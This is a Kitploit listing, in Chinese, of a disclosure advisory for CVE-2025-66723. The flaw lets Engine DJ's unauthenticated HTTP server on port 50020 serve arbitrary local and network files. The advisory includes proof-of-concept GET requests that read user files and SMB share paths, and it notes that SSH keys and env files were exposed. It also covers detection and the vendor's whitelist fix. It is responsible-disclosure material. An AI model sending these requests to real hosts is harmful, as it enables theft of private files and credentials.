Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-66723 — CVE-2025-66723: inMusic Brands Engine DJ >=3.0.0 至 <4.3.4 将本地和网络文件暴露给外部方 | Kitploit
工具/GitHubGitHub/audiopump/cve-2025-66723
漏洞分析漏洞利用数据泄露信息收集Web安全网络安全
GitHubaudiopump/cve-2025-66723

cve-2025-66723

CVE-2025-66723: inMusic Brands Engine DJ >=3.0.0 至 <4.3.4 将本地和网络文件暴露给外部方

查看仓库
6个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-66723:inMusic Brands Engine DJ >=3.0.0 至 <4.3.4 将本地和网络文件暴露给外部方

摘要

inMusic Brands 的软件 Engine DJ 包含一个嵌入式 HTTP 服务器,用于将媒体库文件传输到网络上的已连接客户端。媒体文件通过文件系统路径引用。Engine DJ 不验证客户端身份,也不限制所请求的文件系统路径。这允许攻击者从受影响系统中窃取敏感的本地或网络可访问文件。

攻击者只需能访问受影响主机的网络;无需身份验证或事先交互。

Engine DJ v4.3.4(2025 年 11 月 17 日发布)包含一项缓解措施。建议用户尽快升级。

漏洞分类

  • CWE-552:外部方可访问的文件或目录
  • CWE-862:缺少授权

严重性

CVSS v3.1 基础评分: 7.5(高危)

向量: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

受影响版本

Engine DJ >=3.0.0、<4.3.4,适用于所有平台(macOS、Windows)。

经过专门测试发现受影响/存在漏洞的版本(macOS 和 Windows):

3.0.0, 3.0.1, 3.1.0, 3.1.1, 3.2.0, 3.3.0, 3.4.0,

4.0.0, 4.0.1, 4.1.0, 4.2.0, 4.2.1, 4.3.0

经过专门测试发现不受影响的版本(macOS 和 Windows):

2.0.0, 2.0.1, 2.0.2, 2.1.0, 2.2.0, 2.2.1, 2.2.2, 2.3.0, 2.3.1, 2.3.2, 2.4.0,

4.3.4

详细信息

媒体文件的正常请求

启动时,Engine DJ 会在除 localhost 外的每个 IPv4 网络接口上绑定到端口 :50020。

客户端应使用端口 :50010 上的独立 gRPC 服务来请求访问和搜索媒体文件。一旦找到所需的媒体文件路径,客户端将在端口 :50020 上发起 HTTP 请求:

root@kitploit:~
GET /download/%3CC%3A%2FMusic%2Ftest.flac%3E HTTP/1.1
Host: 192.0.2.1:50020
User-Agent: EngineOS/1.0 DenonDJ
Accept: */*
root@kitploit:~
HTTP/1.1 200 OK
Content-Length: 37517194
Content-Type: application/octet-stream
Keep-Alive: timeout=5, max=5

…

注意:解码后,上面的 GET 路径其实就是:

root@kitploit:~
/download/<C:/Music/test.flac>

发起请求时,不必对这些字符进行百分号编码。

对任意本地文件的恶意请求

攻击者可以请求 Engine DJ 软件运行用户可访问的任何内容,只要攻击者知道该路径即可。在此示例中,使用一个文本文件进行测试:

root@kitploit:~
GET /download/<C:/Users/USERNAME/test.txt> HTTP/1.1
Host: 192.0.2.1:50020
root@kitploit:~
HTTP/1.1 200 OK
Content-Length: 40
Content-Type: application/octet-stream
Keep-Alive: timeout=5, max=5

INSECURE...

From text file test.txt

在概念验证实验室测试期间访问的文件包括私有 SSH 密钥和环境文件。

网络文件

请求的路径不仅限于本地文件。还发现网络路径也可被访问,具体取决于主机的权限:

root@kitploit:~
/download/<//EXAMPLE-SERVER/C$/secret.txt>

跨源 Web 请求

幸运的是,服务器响应中没有 Access-Control-Allow-Origin 头或相关头。因此,文件 无法 从普通的基于 Web 的客户端访问。某些浏览器扩展或标志可用于放宽跨源请求限制,但并不常见。

检测

端口 :50020 上的 IPv4 网络流量可用于猜测 Engine DJ 正在使用中,但并不能表明主机是否存在漏洞。嵌入式服务器不会在其响应中标明自身身份,而且易受攻击与不易受攻击的 Engine DJ 版本之间似乎没有可测量的差异。因此,除非尝试请求一个已知存在的文件,否则从外部似乎无法确定主机是否存在漏洞。

缓解措施

发现后,我们立即通过其技术支持渠道通知了 inMusic Brands。他们回应专业且迅速,并于 2025 年 11 月 17 日随 v4.3.4 一起为 macOS 和 Windows 发布了针对该问题的缓解措施。

虽然媒体文件仍然可以在无需身份验证/授权的情况下下载,但可请求的路径现在已被列入白名单,因此无法访问媒体库之外的文件。对于不在白名单中的任何内容,用户都将收到 403 响应,即使该内容不存在。

root@kitploit:~
GET /download/<C:/Users/USERNAME/test.txt> HTTP/1.1
Host: 192.0.2.1:50020
root@kitploit:~
HTTP/1.1 403 Forbidden
Content-Length: 17
Content-Type: text/html
Keep-Alive: timeout=5, max=5

…

最新 Engine DJ 版本的官方下载可在 Engine DJ 官方网站上找到:

https://enginedj.com/downloads

联系方式

如有关于本报告的问题,请联系作者:

Brad Isbell, AudioPump, Inc. [email protected]

下载工具